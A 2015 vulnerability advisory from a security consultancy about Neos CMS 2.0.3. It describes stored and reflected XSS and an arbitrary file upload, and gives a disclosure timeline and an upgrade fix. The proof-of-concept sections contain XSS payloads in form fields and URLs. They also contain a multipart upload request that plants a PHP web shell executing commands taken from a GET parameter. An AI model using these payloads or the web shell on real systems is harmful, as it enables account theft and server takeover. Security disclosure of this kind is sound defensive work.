######################################################################
# Exploit Title: Neos/Flow multiple vulnerabilities
# Date: 24/11/2015
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.neos.io/
# Version: <= 2.0.3
# Category: Multiple Vulnerabilities
# Tested on : Neos 2.0.3
######################################################################

Neos/Flow Content Application Platform description :
======================================================================
Neos is an open source Content Application Platform based on its own PHP framework (Flow). A set of core Content Management features is resting within a larger context that allows to build a customized experience for users.

Vulnerability description :
======================================================================
Neos 2.0.3 is vulnerable to multiple vulnerabilities like :
- Reflected XSS (without authentication)
- multiple Stored-XSS (with authentication as simple user, editor or administrateor)
- Arbitrary File Upload(Editor and Administrator)

Neos is developed in PHP with the Flow PHP Framework which as also been updated.

Proof of Concept n°1 - Reflected Cross-Site Scripting (SXSS) with editor or administrator authentication :
================================================================================================
An user with "Editor" or "Administrator" permissions can modify an article or page content in a way to make execution of JavaScript instructions.

PoC :

An attacker with "Editor" or "Administrator" permissions have to inject JavaScript instruvctions in the edited pagecontent in the modification panel "In-Place" or "Raw" mode. Then, another user reviewing this same content in "Print" or "Desktop" preview mode will executes the JavaScript instruction. 

Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies. Moreover, an user with "Editor" privileges can use this vulnerability to steal Administrator cookie to lead privileges escalation in Neos.


Proof of Concept n°2 - Reflected Cross-Site Scripting (SXSS) with user authentication :
================================================================================================
An user who can modify his profile informations "Title", "First Name", "Last name", "Middle Name", "Other Name" can inject Javascript instructions in those parameters.

Once set up, an Administrator who wants to edit this user account and go to "Edit" of this account will executes JavaScript instructions.  

PoC :

POST http://webserver/neos/user/usersettings/update HTTP/1.1
Referer: http://webserver/neos/user/usersettings/edit.html

[Vulnerable form input via post data]
[user][title]=<script>alert("SXSS01")</script>
[user][name][firstName]=<script>alert("SXSS02")</script>
[user][name][middleName]=<script>alert("SXSS03")</script>
[user][name][lastName]=<script>alert("SXSS04")</script>
[user][name][otherName]=<script>alert("SXSS05")</script>

Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake login page, or capture users credentials such cookies. Moreover, an user with "Editor" privileges can use this vulnerbility to steal Administrator cookie to lead privileges escalation Neos.

Proof of Concept n°3 - Reflected Cross-Site Scripting (RXSS) without authentication :
================================================================================================
A non-persitent XSS (RXSS) in GET parameter passed during user creation is available in Neos 2.0.3.

When the "newaccount" value is modified for the "--typo3_neosdemotypo3org-registration[@action]" parameter, an error message is displayed. This error message writes back the mispelled value. Then we can inject JavaScript instructions in the "--typo3_neosdemotypo3org-registration[@action]" paramater.

PoC :

http://webserver/neos/en/try-me.html?--typo3_neosdemotypo3org-registration[@package]=typo3.neosdemotypo3org&--typo3_neosdemotypo3org-registration[@controller]=registration&--typo3_neosdemotypo3org-registration[@action]=<script>alert("RXSS")</script>newaccountmispelled

In some implementations of Neos, error message can be hidden via <!-- --> HTML code. In this context, this PoC works, we just have to close the HTML comment in our injection : 
http://webserver/neos/en/try-me.html?--typo3_neosdemotypo3org-registration[@package]=typo3.neosdemotypo3org&--typo3_neosdemotypo3org-registration[@controller]=registration&--typo3_neosdemotypo3org-registration[@action]=--><script>alert("RXSS")</script>newaccountmispelled

Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies.

Proof of Concept n°4 - Arbitrary File Upload :
================================================================================================
With an user account with "Editor" or "Administrator", it is possible to upload arbitrary file.

Through this vulnerability, an attacker could upload other type than image file like PHP script. A PHP script can give additional action possibility like executing instructions on the server side.

PoC :

POST http://webserver/neos/management/media/upload?__csrfToken=xxxxxxxxxe3
 Type Mime[text/html]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0]
      Referer[http://webserver/neos/management/media/]
      Content-Type[multipart/form-data; boundary=---------------------------32007199347844]
   Données POST:
      POST_DATA[-----------------------------32007199347844
Content-Disposition: form-data; name="name"

file.php
-----------------------------32007199347844
Content-Disposition: form-data; name="moduleArguments[asset][resource]"; filename="file.php"
Content-Type: application/octet-stream

<?php
$output = shell_exec($_GET['cmd']);
echo "<pre>$output</pre>";
?>
-----------------------------32007199347844--
]

This arbitrary file can then be retrieved through the "Media" panel which gives the full URL to the selected file.

Screenshots :
======================================================================

- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-03.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-05.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-08.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-09.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-12.jpg
- http://www.information-security.fr/wp-content/uploads/2015/11/neos-2-0-3-multiple-vulnerabilities-16.jpg


Solution: 
======================================================================

- I suggest to upgrade your Neos installation to the next version (2.0.4) : https://github.com/neos/neos-development-collection/releases/tag/2.0.4
 
Additional resources :
======================================================================
- Article https://information-security.fr/en/sxss-rxss-arbitrary-file-upload-neos-cms-version-2-0-3
- Video Poc : https://www.youtube.com/watch?v=j0Mli_EQpQo
- Official security fixes for Neos / Flow: https://www.neos.io/news/neos-flow-security-fixes.html

Report timeline :
======================================================================
 
2015-11-09 : Informed Vendor about issues
2015-11-09 : Vendor response and investigation
2015-11-11 : Vendor feedback concerning new version 
2015-11-24 : New version of the product released
2015-11-24 : Public Advisory released

Credits :
======================================================================
 
    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security
 
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS 
CONTACT: www.synetis.com | www.information-security.fr